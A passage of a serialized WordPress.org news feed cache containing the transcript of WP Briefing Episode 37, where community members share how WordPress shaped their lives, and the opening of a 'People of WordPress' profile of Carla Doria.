class=\'mentions-prefix\'>@</span>rmartinezduque</a>.</em></em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"13306\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:17;a:6:{s:4:\"data\";s:61:\"\n		\n		\n		\n		\n		\n				\n		\n		\n\n					\n										\n					\n		\n		\n\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:69:\"WP Briefing: Episode 37: The World of WordPress on World Wide Web Day\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:91:\"https://wordpress.org/news/2022/08/episode-37-the-world-of-wordpress-on-world-wide-web-day/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 01 Aug 2022 23:15:22 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:7:\"Podcast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:11:\"wp-briefing\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://wordpress.org/news/?post_type=podcast&p=13198\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:128:\"Celebrating WWW Day, Josepha invites contributors from around the globe to share stories of how WordPress impacts their worlds. \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"enclosure\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:3:\"url\";s:60:\"https://wordpress.org/news/files/2022/08/WP-Briefing-037.mp3\";s:6:\"length\";s:1:\"0\";s:4:\"type\";s:0:\"\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Chloe Bringmann\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:23689:\"\n<p>In the thirty-seventh episode of the WordPress Briefing, WordPress users and contributors reflect on how WordPress has changed their understanding of the web as we celebrate World Wide Web Day.</p>\n\n\n\n<p><em><strong>Have a question you&#8217;d like answered? You can submit them to <a href=\"mailto:wpbriefing@wordpress.org\">wpbriefing@wordpress.org</a>, either written or as a voice recording.</strong></em></p>\n\n\n\n<h2>Credits</h2>\n\n\n\n<p>Editor:&nbsp;<a href=\"https://profiles.wordpress.org/dustinhartzler/\">Dustin Hartzler</a><br>Logo:&nbsp;<a href=\"https://profiles.wordpress.org/beafialho/\">Beatriz Fialho</a><br>Production:&nbsp;<a href=\"https://profiles.wordpress.org/santanainniss/\">Santana Inniss</a> &amp; <a href=\"https://profiles.wordpress.org/cbringmann/\">Chloé Bringmann</a><br>Song: Fearless First by Kevin MacLeod</p>\n\n\n\n<p>Guests: </p>\n\n\n\n<ul><li><a href=\"https://profiles.wordpress.org/awarner20/\">Adam Warner</a></li><li><a href=\"https://profiles.wordpress.org/aliceorru/\">Alice Orrù</a></li><li><a href=\"https://profiles.wordpress.org/thewebprincess/\">Dee Teal</a></li><li><a href=\"https://profiles.wordpress.org/femkreations/\">Femy Praseeth</a></li><li><a href=\"https://profiles.wordpress.org/jillbinder/\">Jill Binder</a></li><li><a href=\"https://wordpress.org/support/users/mariaojob/\">Mary Job</a></li><li><a href=\"https://profiles.wordpress.org/onealtr/\">Oneal Rosero</a></li><li><a href=\"https://profiles.wordpress.org/iamsirotee/\">Theophilus Adegbohungbe</a></li><li><a href=\"https://profiles.wordpress.org/ugyensupport/\">Ugyen Dorji</a></li></ul>\n\n\n\n<h2>References</h2>\n\n\n\n<p><a href=\"https://make.wordpress.org/community/handbook/meetup-organizer/event-formats/diversity-speaker-training-workshop/\">Diverse Speaker Training Group</a></p>\n\n\n\n<p><a href=\"https://us.wordcamp.org/2022/support-underrepresented-speakers-at-wordcamp-us/\">Support Underrepresented Speakers at WordCamp US</a></p>\n\n\n\n<p><a href=\"https://asia.wordcamp.org/2023/call-for-speakers/\">Call of Speakers &#8211; WordCamp Asia 2023</a></p>\n\n\n\n<p><a href=\"https://make.wordpress.org/mobile/2022/07/27/refocusing-the-wordpress-app-on-core-features/\">Refocusing the WordPress App on Core Features</a></p>\n\n\n\n<p><a href=\"https://make.wordpress.org/design/2022/07/08/project-kickoff-wordpress-org-homepage-and-download-page-redesign/\">WordPress.org Homepage and Download Redesign </a></p>\n\n\n\n<h2>Transcript</h2>\n\n\n\n<span id=\"more-13198\"></span>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:00:00]&nbsp;</strong></p>\n\n\n\n<p>Hello, everyone! And welcome to the WordPress Briefing: the podcast where you can catch quick explanations of the ideas behind the WordPress open source project, some insight into the community that supports it, and get a small list of big things coming up in the next two weeks. I’m your host, Josepha Haden Chomphosy. Here we go!</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:00:39]&nbsp;</strong></p>\n\n\n\n<p>Today is one of my favorite niche holidays &#8211; World Wide Web Day &#8211; which serves to raise awareness about the origins of the World Wide Web project. WordPress, as part of Web 2.0, only ever had a chance to exist because the web, as we have come to know it exists. So in order to mark this nerdy day on the WP Briefing, I invited a number of community members to share a bit about how WordPress has been a part of their lives.</p>\n\n\n\n<p>But first, let&#8217;s do some introductions.&nbsp;</p>\n\n\n\n<p><strong>[Adam Warner 00:01:07]</strong></p>\n\n\n\n<p>My name is <a href=\"https://profiles.wordpress.org/awarner20/\">Adam Warner</a>, and I&#8217;m originally from a small town in west Michigan, now residing in Orlando, Florida.&nbsp;</p>\n\n\n\n<p><strong>[Alice Orrù 00:01:15]&nbsp;</strong></p>\n\n\n\n<p>My name is <a href=\"https://profiles.wordpress.org/aliceorru/\" data-type=\"URL\" data-id=\"https://profiles.wordpress.org/aliceorru/\">Alice Orrù</a>. I&#8217;m Italian. I was born in the beautiful island of Sardinia, but I&#8217;ve been living in Spain in the province of Barcelona for 10 years.</p>\n\n\n\n<p><strong>[Dee Teal 00:01:26]</strong></p>\n\n\n\n<p>My name is <a href=\"https://profiles.wordpress.org/thewebprincess/\">Dee Teal</a>; Dee is short for Denise. I&#8217;m from New Zealand, but I live In Melbourne.</p>\n\n\n\n<p><strong>[Femy Praseeth 00:01:33]</strong></p>\n\n\n\n<p>Yeah, my name is <a href=\"https://profiles.wordpress.org/femkreations/\">Femy Praseeth</a>. I was born and raised in India and now live in San Jose, California, with my family and cuddly Doodle.</p>\n\n\n\n<p><strong>[Jill Binder 00:01:41]&nbsp;</strong></p>\n\n\n\n<p>My name is <a href=\"https://profiles.wordpress.org/jillbinder/\">Jill Binder</a>, and I&#8217;ve just moved back to Vancouver, Canada.&nbsp;</p>\n\n\n\n<p><strong>[Mary Job 00:01:47]&nbsp;</strong></p>\n\n\n\n<p>My name is <a href=\"https://wordpress.org/support/users/mariaojob/\">Mary Job</a>. I&#8217;ve been using WordPress since 2015, and I&#8217;m from Nigeria. I&#8217;m from the Western part of Nigeria. Ijebu precisely.&nbsp;</p>\n\n\n\n<p><strong>[Oneal Rosero 00:01:57]</strong></p>\n\n\n\n<p>Yes. My name is <a href=\"https://profiles.wordpress.org/onealtr/\">Oneal Rosero</a>. I am from the Philippines and I&#8217;ve been using WordPress since 2007.&nbsp;</p>\n\n\n\n<p><strong>[Theophilus Adegbohungbe</strong> <strong>00:02:06]&nbsp;</strong></p>\n\n\n\n<p>Thank you. My name is <a href=\"https://profiles.wordpress.org/iamsirotee/\">Theophilus Adegbohungbe</a> . And I&#8217;m from Ilesa, Osun State in Nigeria.&nbsp;</p>\n\n\n\n<p><strong>[Ugyen Dorji 00:02:14]</strong></p>\n\n\n\n<p>My name is <a href=\"https://profiles.wordpress.org/ugyensupport/\">Ugyen Dorji</a> and I&#8217;m from Bhutan. And I&#8217;m working with WordPress for more than five years.&nbsp;</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:02:22]&nbsp;</strong></p>\n\n\n\n<p>One of the things I enjoy the most about being part of any community is being able to see how people change and grow over time as they learn and gain confidence in their own expertise. So a favorite early question is naturally, ‘How has WordPress changed your World?’</p>\n\n\n\n<p><strong>[Alice Orrù 00:02:37]&nbsp;</strong></p>\n\n\n\n<p>WordPress changed my world in many ways. But, uh, starting from the moment, it allowed me to become part of a global connected and welcome community. I started using WordPress as a blogger many, many years ago, but it was in 2015 that I started working behind the scenes of WordPress with a plugin company.</p>\n\n\n\n<p>And that was the moment when everything changed, basically, because I realized that WordPress was much more than a CMS for creating websites. It was a world full of opportunities for networking, making new friends and walking a new professional path as well.&nbsp;</p>\n\n\n\n<p><strong>[Ugyen Dorji 00:03:15]&nbsp;</strong></p>\n\n\n\n<p>During one interview, I was asked many questions about WordPress and although I had a basic understanding of WordPress, I struggled to give detailed answers.</p>\n\n\n\n<p>After that interview, I resolved to develop my skills and learn as much about WordPress as possible. A few months passed and I received a call from ServeMask In, [who] had developed a plugin called All-in-One WP Migration plugin. They offered me a position which fulfilled my wish to work with WordPress full time.</p>\n\n\n\n<p>And because of that, I am now an active contributor to the WordPress community as bread and butter, with the best career in the world.</p>\n\n\n\n<p><strong>[Theophilus Adegbohungbe 00:04:03]&nbsp;</strong></p>\n\n\n\n<p>If you are very familiar with my country, Nigeria things here, it&#8217;s not as smooth as it is in other parts of the world. That is, when you are done in school in my university, you have to find means of surviving yourself.&nbsp; There is nothing like the government have work for you. There is nothing like you finish our institution and you get job instantly. So it&#8217;s very tough here. And, year by year, schools keep producing graduates with no companies to employ them and no government job again as well.</p>\n\n\n\n<p>So I personally, I was able to gain freedom from this with the help of WordPress.</p>\n\n\n\n<p><strong>[Femy Praseeth 00:04:51]</strong></p>\n\n\n\n<p>WordPress completely changed my work life. I started working independently. I started freelancing with agencies and designers and, uh, building websites from their web designs. And this was around the time my son was born. Actually, he was in elementary school and I think this was around 2014 or so. I started working remotely when remote was not even a thing.</p>\n\n\n\n<p>And there were very few companies that let you work from home and remote was not a mainstream thing at all, but with WordPress, I could set my own working hours while my son was in school.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:05:29]&nbsp;</strong></p>\n\n\n\n<p>And of course, my preferred follow-up question of, ‘How did you hear about us?’ or ‘How did you connect to this global community?’</p>\n\n\n\n<p><strong>[Oneal Rosero 00:05:36]&nbsp;</strong></p>\n\n\n\n<p>Yes, actually what I love about WordPress is that it&#8217;s a community. It&#8217;s not a business. It&#8217;s not a company. It&#8217;s a community. It&#8217;s a community that&#8217;s always ready to help support, teach and encourage people. That&#8217;s how I felt when I joined the community. There&#8217;s always somebody who has your back.</p>\n\n\n\n<p>There&#8217;s always somebody who&#8217;s going to guide you. There&#8217;s always an expert who will take your hand and lead you into the beauty that is WordPress.&nbsp;</p>\n\n\n\n<p><strong>[Adam Warner 00:06:05]&nbsp;</strong></p>\n\n\n\n<p>The way that I connect with the global community these days are one, of course, is .org Slack. Another of course is Twitter as there&#8217;s a very active WordPress community there.</p>\n\n\n\n<p>And then with WordCamps all over the globe. I&#8217;m lucky enough to have been able to travel to several hundred WordCamps through the years in the US and abroad. And that&#8217;s one of the most rewarding parts is meeting people from all over the world and you see really how small and the world really is and how similar we really all are.</p>\n\n\n\n<p><strong>[Theophilus Adegbohungbe 00:06:39]&nbsp;</strong></p>\n\n\n\n<p>So, not until 2020. I don’t know if you know this lady, a very vibrant lady in WordPress. She&#8217;s from Nigeria; her name is Mary Job, and she&#8217;s really promoting WordPress here. So it was through her that I got to know about the community. Yes.</p>\n\n\n\n<p><strong>[Jill Binder 00:06:54]</strong></p>\n\n\n\n<p>My work is the global WordPress community. So we hold our three programs for the global WordPress community, and we are always trying to reach more and more countries. For quite a while, it was very North America-heavy, and then I made some efforts to expand. And it&#8217;s very exciting that this year, some contributors in our team have actually launched an Asia Pacific branch of our group.&nbsp;</p>\n\n\n\n<p>And so we have two meetings every other week where we have the America/Europe and the APAC, and we&#8217;ve also been able to reach other countries as well, but we typically reach something like between 20 and 50 countries a year, depending on the year. So a hundred percent global. Yes.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:07:39]&nbsp;</strong></p>\n\n\n\n<p>How has WordPress, either the CMS or the project, made you feel more connected? And are there any surprising connections that came from WordPress?</p>\n\n\n\n<p><strong>[Dee Teal&nbsp; 00:07:47]&nbsp;</strong></p>\n\n\n\n<p>I guess the surprising connections I think that have come from WordPress have been the fact that I feel like I&#8217;ve got friends all over the world. And a lot of those have come out of community involvement and from contributing. That I could go to a, a meetup pretty much anywhere in the world and probably find somebody I know, or at least a second degree connection of somebody that I haven&#8217;t, you know, that I might not have met, but know somebody that I know. And certainly that happens fairly regularly.&nbsp;</p>\n\n\n\n<p><strong>[Mary Job 00:08:13]</strong></p>\n\n\n\n<p>WordPress. The WordPress project, the community, has made me feel connected in a huge way, because I am literally surrounded by everything WordPress. So I like how, when you meet somebody who does WordPress, there&#8217;s this instant, ‘Oh, we&#8217;re brothers,’ or&nbsp; ‘Oh, we&#8217;re sisters!’ You know? There&#8217;s that feeling? That&#8217;s how I feel.&nbsp;</p>\n\n\n\n<p>So when I see somebody who does WordPress, as I do, I&#8217;m like, ‘Oh yeah, we&#8217;re, kin.’ You know? We are family. That&#8217;s how I feel when I meet people who do WordPress. And I&#8217;ve met quite a number of people who do WordPress from like around the world. Like I have a friend here, he&#8217;s from the Benin Republic, and we host started a dinner on Friday night and one of my guests was asking me, ‘How did you guys meet?’</p>\n\n\n\n<p>I was like, ‘Oh yeah, we work in the same WordPress ecosystem.’ He attended our WordCamp, we became friends, and we just literally became really good friends. So I have tons of people that I&#8217;ve met like that I hold in high esteem.</p>\n\n\n\n<p><strong>[Ugyen Dorji 00:09:12]&nbsp;</strong></p>\n\n\n\n<p>WordPress Meetups are the seeds that lead to the growth of WordPress communities. WordCamp is a platform for plugin and theme developers to meet WordPress users and website developers. It&#8217;s a great environment where many incredible discussions about WordPress takes place. With each WordCamp there is a &#8220;tribe&#8221; meeting, where I think people [can] get more connected. It&#8217;s a fantastic opportunity for aspiring computer engineers, generators and get to showcase their talent and meet each other.</p>\n\n\n\n<p><strong>[Alice Orrù 00:09:51]&nbsp;</strong></p>\n\n\n\n<p>On the project level, it has given me the opportunity to feel like an active part of a global project. The idea that I can give my contribution to making the web a better place &#8211; it’s amazing. And I do so with the Translation team, so making WordPress accessible to all the people that use the core plugins and themes in Italian, and prefer to do that in Italian.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:10:18]</strong>&nbsp;</p>\n\n\n\n<p>What area of the WordPress world is most important to you?</p>\n\n\n\n<p><strong>[Jill Binder 00:10:21]</strong></p>\n\n\n\n<p>I have a little bit of a passion for diversity in tech and diversity in WordPress, specifically around events. And so, here&#8217;s a chance to name the three programs that we&#8217;ve been working on this year. So as mentioned a few times, we have our <a href=\"https://make.wordpress.org/community/handbook/meetup-organizer/event-formats/diversity-speaker-training-workshop/\">Diverse Speaker Workshop</a> that helps people go from not even having the thought that people could step up on stage.</p>\n\n\n\n<p>And then the second program is because of the pandemic. There was no longer the straight path from taking our workshop to speaking, because we used to hold them or people used to hold them for their WordCamps and meetups. And so it was like, okay, you&#8217;ve taken. Apply for our next WordCamp or meetup. But during the pandemic, that wasn&#8217;t a thing.</p>\n\n\n\n<p>So we have this amazing channel that we welcome everyone to join, allies and people from underrepresented groups who are interested in speaking or interested in supporting people and speaking. And that&#8217;s the Diverse Speaker channel <a href=\"https://wordpress.slack.com/archives/C028SE81N3H\">diverse-speaker-support</a> channel on the Make WordPress slack.</p>\n\n\n\n<p>And the third program is, and we, we went through a name change recently. So I&#8217;ll try to remember the new change it&#8217;s Organizing Inclusive and Diverse WordPress Events. And this is for WordCamp and meetup organizers to learn. We&#8217;ve learned over the last couple years, how important it is to create inclusive spaces and be good allies.</p>\n\n\n\n<p>But how do we actually do that? And a few of us created a very action oriented workshop in 2019 for WCUS, and that is now the basis of the work that we are bringing to people and people are loving it.. We&#8217;ve had people report a 40%, self-report 40%, increase in feeling prepared to create an inclusive event from before and after taking that workshop, which is super cool.</p>\n\n\n\n<p>Yeah. So, that’s my passion.&nbsp;</p>\n\n\n\n<p><strong>[Oneal Rosero 00:12:13]&nbsp;</strong></p>\n\n\n\n<p>I really love helping the WP Diversity team. I love running the workshops. I love running the workshops for myself, because I used to do training for software back before the pandemic. I used to train up to a thousand people a year in person, sometimes like 500 people in a room at once.</p>\n\n\n\n<p>But of course I had to shift. I had to pivot to online training, which is what the training team has brought for me. And the focus on the diversity. I like running the workshops. I like running workshops for different groups, different countries, because it&#8217;s nice to meet new people. It&#8217;s nice to hear about their culture, about the limitations that people have in Africa with connectivity.</p>\n\n\n\n<p>So they, they resort to using WhatsApp on their phone in order to do a meetup. That&#8217;s how they do their, their meetings, their discussions. It&#8217;s unlike other countries where we can do video calls. They have to use their mobile phones because connectivity isn&#8217;t accessible.&nbsp;</p>\n\n\n\n<p>Places like in the Philippines that get affected when it starts to rain a little bit, we lose our internet. So we have backups and our backups have backups. So there are many things that you learn that are different when you&#8217;re living in the city, when you&#8217;re living in the provinces, in the country. So it&#8217;s so many things that you learn about people and how they&#8217;re able to adapt.&nbsp;</p>\n\n\n\n<p><strong>[Adam Warner 00:13:35]</strong>&nbsp;</p>\n\n\n\n<p>Enabling end users to reach their goals. And whether that means participating in contributing to the software, to the Core software itself, in terms of UI/UX usability. That can include participating in the community and sharing your knowledge proactively with users who may be new to the platform, or have used WordPress for a while, but now want to step up their game, get a little deeper into using their websites as a tool for growth, for whatever business that they&#8217;re in. So, I mean, overall, the, the most important part of the WordPress world to me are the end users. And, you know, there, there is this quote unquote inner circle of WordPress community people. People who are involved in .org, people who contribute to the software, people who contribute to the 20 plus make.wordpress.org teams.</p>\n\n\n\n<p>Those we have to keep in mind, are not the average user by and far. They are not the typical user that hears the word WordPress and then goes out and searches it and then has to figure out how to use it. So I think user experience is probably the most important part for me and making sure that any of that innate knowledge that we have in that inner circle of WordPress because many of us have been using it for so long, keeping in mind that is not the norm. And it&#8217;s not the scale at which WordPress is used and, and making sure we translate complex concepts down to a layperson&#8217;s terms that might not be as familiar.&nbsp;</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:15:17]&nbsp;</strong></p>\n\n\n\n<p>One of the things that I have always found so fascinating about the web and WordPress’ role in it is how it has made the world simultaneously smaller and bigger. By giving voices to the voiceless we help each other find our community niches regardless of where they are in the world. Some of your closest friends could be people you would never meet in your own neighborhood. Well, let’s hear what some of our community members had to say about that.</p>\n\n\n\n<p><strong>[Dee Tea 00:15:42]</strong></p>\n\n\n\n<p>I think the thing that has been most empowering is, is coming into the project either in terms of contributing time and efforts to the community, which is where most of my contribution has been &#8211; has always been about this is a really cool thing, and I really want to build this.</p>\n\n\n\n<p>And so I&#8217;ll put my time and efforts into building WordPress. Not for me, but because I see its value and I see its community and I see that the contribution that it&#8217;s making to the world and I, and that&#8217;s really important. But finding that on the other side of that was a huge amount of personal benefit for me in my career, in the friendships that I&#8217;ve made.</p>\n\n\n\n<p>But I feel like if I had been approaching the community with, I want a better career, I wanna meet all of these people and I want, and I want all of this. From, “I want” for me, instead of, I want for this project, for the community and effectively for the world with that, you know, that whole democratized, the democratizing of publishing is this thing that serves the world.</p>\n\n\n\n<p>I think that&#8217;s been the key for me is that I absolutely have reaped amazing benefits from it, but it came out of that sense of, I see this value here and I want to contribute to that because it&#8217;s gonna have value, not just for me, but for a whole slew of people. And so, uh, you know, for much, much bigger impact than just on me.</p>\n\n\n\n<p>And so I think that&#8217;s the important thing for me is that sense of, if you approach it with that attitude of what can I do to help? It&#8217;s amazing what you will find yourself helped with in return.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:17:24]&nbsp;</strong></p>\n\n\n\n<p>I hope that you enjoyed this tour of WordPress in the World Wide Web. I want to share a big thank you to all of the folks who contributed to our little WordPress Briefing celebration of World Wide Web Day today.</p>\n\n\n\n<p>And that brings us now to our small list of big things. So firstly, we&#8217;ve got a couple of updates from our upcoming flagship events. WordCamp US has announced a speaker support fund specifically for historically underrepresented speakers at the event. You can donate to the fund on the page if you&#8217;d like, and there are also directions on how to request support, if you are part of an underrepresented group.&nbsp;</p>\n\n\n\n<p>From the folks over at WordCamp Asia, the call for speakers is live. That&#8217;s taking place in February, 2023. But it&#8217;s never too early to brush up those presentations and get them submitted.&nbsp;</p>\n\n\n\n<p>Next big thing is that there are some changes coming to the WordPress mobile app. A lot of the Jetpack functionality will be removed from it, so this is going to have a little bit of an effect on daily users of the app, but it will also have an effect on regular contributors. I&#8217;ll have a link to the full write up in the show notes so that you don&#8217;t have to guess or hold it all in your memory.&nbsp;</p>\n\n\n\n<p>And finally, this excellent design that you see on wordpress.org/news is finally making its way out to the next parts of the wordpress.org website. Before you know, it, there will be a fresh looking homepage as well as few other pages and then… to infinity and beyond (or something like that).&nbsp;</p>\n\n\n\n<p>And that, my friends, is your small list of big things. Thank you for tuning in today for the WordPress Briefing. I&#8217;m your host, Josepha Haden Chomphosy. And next up I&#8217;ll be taking just a mid-year break from the podcast. And so the next time that I actually see you again, will be in September.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"13198\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:18;a:6:{s:4:\"data\";s:72:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"People of WordPress: Carla Doria\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"https://wordpress.org/news/2022/07/people-of-wordpress-carla-doria/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 31 Jul 2022 19:00:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:6:{i:0;a:5:{s:4:\"data\";s:9:\"Community\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Features\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:7:\"General\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:10:\"Interviews\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:4;a:5:{s:4:\"data\";s:9:\"HeroPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:5;a:5:{s:4:\"data\";s:19:\"People of WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=13201\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:324:\"In this series, we share some of the inspiring stories of how WordPress and its global network of contributors can change people’s lives for the better. This month we feature Carla Doria, a customer support specialist from South America on how WordPress opened up a new world for her, and gave her the ability to [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"Meher Bala\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:12025:\"\n<p><strong>In this series, we share some of the inspiring stories of how WordPress and its global network of contributors can change people’s lives for the better. This month we feature Carla Doria, a customer support specialist from South America on how WordPress opened up a new world for her, and gave her the ability to help the local community</strong>.</p>\n\n\n\n<p>For Carla, working with WordPress is a vital part of her life. It gave her a career and a community, in which she she would organize the first WordCamp in her city, Cochabamba, and the first in Bolivia.</p>\n\n\n\n<p>Carla studied industrial engineering and has a master’s degree in environmental studies.<br>Her first experience with WordPress was when she decided to start a small business designing and selling cushions and bedclothes.&nbsp;While Carla sat in the small store she had rented, hoping that people stopping at the shop windows would step in to buy something, she decided she needed to create a website.</p>\n\n\n\n<h2><strong>First steps with WordPress</strong></h2>\n\n\n\n<p>Carla had no budget to hire somebody, but she felt confident&nbsp; she could learn things on her own.&nbsp;</p>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>“Learning to use WordPress requires no code skills or a technical background. It needs an adventurous and playful spirit.” </p><cite>Carla Doria</cite></blockquote>\n\n\n\n<p>She had always been studious, and decided she would figure out how to build a website herself. Carla ended up building a simple blog with WordPress. At the time, she didn’t even have a budget to buy a custom domain, so she used a free subdomain.<br><br>“Learning to use WordPress is easy. It requires no code skills or a technical background at all. It only needs an adventurous and playful spirit,” said Carla</p>\n\n\n\n<p>There were no profits, and any income mainly went to pay the store’s rent. At the time, her previous company contacted her for a job opening that matched her profile. Carla needed that income and decided to closed the store and forget about being an entrepreneur.</p>\n\n\n\n<p>Back in employee mode, Carla started her new job as a technical writer for a software development company. Since Carla had completed her master’s degree in the UK, she was proficient in English. Her close affinity for computers and technology made it easy for her to translate complex software jargon into simple tutorial steps.</p>\n\n\n\n<p>As Carla got more interested in technical writing and started to improve her writing skills. This reconnected her with her previous enthusiasm for writing, and she decided to channel that interest into a blog.</p>\n\n\n\n<h2><strong>Diving deep</strong></h2>\n\n\n\n<p>Creating her blog helped her become more familiar with WordPress and building websites. In 2015, Carla blogged about writing, her thoughts, book reviews, and everything that came to mind.&nbsp;</p>\n\n\n\n<p>Through looking for answers to specific issues using her WordPress blog, Carla found the support forums a useful place to go. Soon she realized that she could also help answer other people’s questions.</p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"600\" height=\"900\" src=\"https://i1.wp.com/wordpress.org/news/files/2022/07/carla-doria-2.jpg?resize=600%2C900&#038;ssl=1\" alt=\"\" class=\"wp-image-13189\" srcset=\"https://i1.wp.com/wordpress.org/news/files/2022/07/carla-doria-2.jpg?w=600&amp;ssl=1 600w, 